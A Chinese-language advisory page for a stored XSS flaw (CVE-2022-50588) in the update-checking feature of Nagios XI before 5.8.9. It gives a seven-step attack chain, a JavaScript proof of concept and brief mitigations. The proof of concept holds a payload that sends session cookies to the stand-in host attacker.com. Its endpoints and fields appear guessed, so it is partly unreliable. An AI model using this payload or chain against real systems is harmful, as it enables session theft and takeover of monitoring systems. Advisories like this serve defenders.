Nagios XI 5.8.9之前版本update checking功能存在存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2022-50588

漏洞类型

XSS (跨站脚本)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI

漏洞概述

CVE-2022-50588是Nagios XI中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于Nagios XI的更新检查功能中，由于对用户输入的验证或转义不充分，攻击者可以在更新检查功能的输入字段中注入恶意JavaScript脚本。当其他用户访问相关页面或触发更新检查功能时，这些恶意脚本会在受害者浏览器上下文中执行，从而窃取会话cookie、劫持用户账户或执行其他恶意操作。攻击者利用此漏洞需要低权限用户身份，并且需要诱导其他用户进行交互操作。CVSS评分5.4属于中等严重程度，主要影响系统的机密性和完整性。Nagios XI是一款广泛使用的企业级网络和系统监控工具，因此该漏洞可能影响大量使用该平台进行IT基础设施监控的组织。

技术细节

该漏洞属于存储型XSS(Stored XSS)，攻击者将恶意脚本永久存储在服务器端。当系统其他用户访问包含恶意内容的页面时，脚本会自动执行。漏洞位于Nagios XI的update checking功能模块，该模块用于检查Nagios XI及其组件的可用更新。攻击者通过在更新检查功能的输入字段中注入包含恶意JavaScript代码的 payload，当管理员或普通用户访问更新检查页面或触发相关功能时，恶意代码会在其浏览器中以当前会话的权限上下文执行。由于Nagios XI的管理界面通常具有较高权限，成功利用此漏洞可能导致整个监控系统的完全沦陷。攻击者可以窃取管理员会话令牌、修改监控配置、添加后门账户或横向移动到其他关联系统。

攻击链分析

STEP 1

信息收集

攻击者识别目标环境中运行的Nagios XI版本，确认版本低于5.8.9以确定漏洞存在

STEP 2

账户获取

攻击者获取Nagios XI系统的低权限用户账户（PR:L要求），可通过默认凭据、暴力破解或社工手段获得

STEP 3

XSS注入

攻击者登录系统后，在update checking功能的输入字段中注入恶意JavaScript代码，payload被存储到数据库

STEP 4

诱导交互

攻击者诱导具有更高权限的用户（如管理员）访问更新检查页面或触发更新检查功能（UI:R要求）

STEP 5

脚本执行

管理员访问页面时，恶意脚本在其浏览器上下文中执行，可窃取会话cookie或执行特权操作

STEP 6

权限提升

攻击者利用窃取的会话cookie冒充管理员身份，完全控制Nagios XI系统

STEP 7

持久化

攻击者在系统中创建后门账户或修改监控配置，实现长期持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50588 Nagios XI Stored XSS PoC
// Target: Nagios XI < 5.8.9 update checking feature
// This PoC demonstrates XSS injection in update checking functionality

const axios = require('axios');
const cheerio = require('cheerio');

async function exploitNagiosXI(targetUrl, sessionCookie) {
    const xssPayload = '<script>document.location="http://attacker.com/steal?c="+document.cookie</script>';
    
    try {
        // Step 1: Login to Nagios XI
        const loginData = {
            'username': 'attacker_username',
            'password': 'attacker_password'
        };
        
        const loginResponse = await axios.post(
            `${targetUrl}/nagiosxi/login.php`,
            loginData,
            { headers: { 'Cookie': sessionCookie } }
        );
        
        // Step 2: Navigate to update checking page
        const updatePage = await axios.get(
            `${targetUrl}/nagiosxi/admin/?updatecheck=1`,
            { headers: { 'Cookie': sessionCookie } }
        );
        
        // Step 3: Inject XSS payload in update checking field
        const exploitResponse = await axios.post(
            `${targetUrl}/nagiosxi/admin/updatecheck.php`,
            {
                'check_type': 'manual',
                'version_input': xssPayload,
                'submit': 'Check for Updates'
            },
            { headers: { 'Cookie': sessionCookie } }
        );
        
        console.log('[+] XSS payload injected successfully');
        console.log('[+] Payload will execute when admin visits update page');
        
    } catch (error) {
        console.error('[-] Exploitation failed:', error.message);
    }
}

// Usage
// exploitNagiosXI('http://target-nagiosxi.com', 'nagiosxi=c2ltcGxlY29va2ll');

影响范围

Nagios XI < 5.8.9

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 禁用不必要的update checking功能；2) 实施Web应用防火墙(WAF)规则过滤恶意脚本关键词；3) 限制低权限用户对update checking功能的访问；4) 加强对管理员会话的监控和异常检测；5) 定期审计Nagios XI的访问日志以发现可疑活动。